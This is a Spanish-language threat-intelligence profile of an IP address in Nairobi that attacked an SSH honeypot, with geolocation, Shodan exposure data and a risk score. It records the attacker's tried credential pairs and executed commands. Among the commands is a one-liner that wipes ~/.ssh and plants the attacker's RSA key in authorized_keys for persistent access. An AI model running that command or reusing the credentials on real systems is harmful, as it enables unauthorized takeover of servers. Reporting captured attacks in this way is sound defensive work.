TROYANOSYVIRUS
Amenaza ActivaALTO

197.248.34.233

Pais de Origen🇰🇪 KE
Primera Deteccion22/1/2026
Ultima Actividad18/4/2026
ISPSafaricom
🎯
890
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
27
Malware

Geolocalizacion

Pais
🇰🇪 KE
Ciudad
Nairobi
ASN
AS37061
ISP
Safaricom

Tipos de Ataque

ssh_telnet_honeypot

Puertos Atacados

22

Malware Asociado

Credenciales Intentadas

🔐345gs5662d34/345gs5662d34
6x
🔐ubuntu/L3tM31n!
1x
🔐bernardo/bernardo
1x
🔐testman/123qwe
1x
🔐cool/3245gs5662d34
1x
🔐root/root05!
1x
🔐root/jimmy
1x
🔐hu/3245gs5662d34
1x
🔐root/azerty123
1x
🔐root/Zz123456@
1x
🔐amir/3245gs5662d34
1x
🔐tester/a
1x
🔐ubuntu/aa123456..
1x
🔐test/P@ssword1!
1x
🔐jirka/jirka123
1x

Comandos Ejecutados

$Enter new UNIX password:4x
$cd ~; chattr -ia .ssh; lockr -ia .ssh3x
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~3x
$lockr -ia .ssh3x
$uname -a2x
$w2x
$cat /proc/cpuinfo | grep name | wc -l2x
$lscpu | grep Model2x
$top2x
$uname -m2x

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Puertos
228010443
Vulnerabilidades
CVE-2022-29404CVE-2022-28615CVE-2012-3526CVE-2024-43204CVE-2007-4723CVE-2024-38474CVE-2006-20001CVE-2022-30556CVE-2013-0942CVE-2013-2765CVE-2024-39573CVE-2025-53020CVE-2011-2688CVE-2025-59775CVE-2025-66200CVE-2023-25690CVE-2023-31122CVE-2022-31813CVE-2024-38477CVE-2012-4360
Hostnames
197-248-34-233.safaricombusiness.co.ke
CPEs
cpe:/a:openbsd:openssh:8.9p1cpe:/o:fortinet:fortioscpe:/a:apache:http_server:2.4.52cpe:/o:canonical:ubuntu_linux

Evaluacion de Riesgo

65
/100
BajoMedioAltoCritico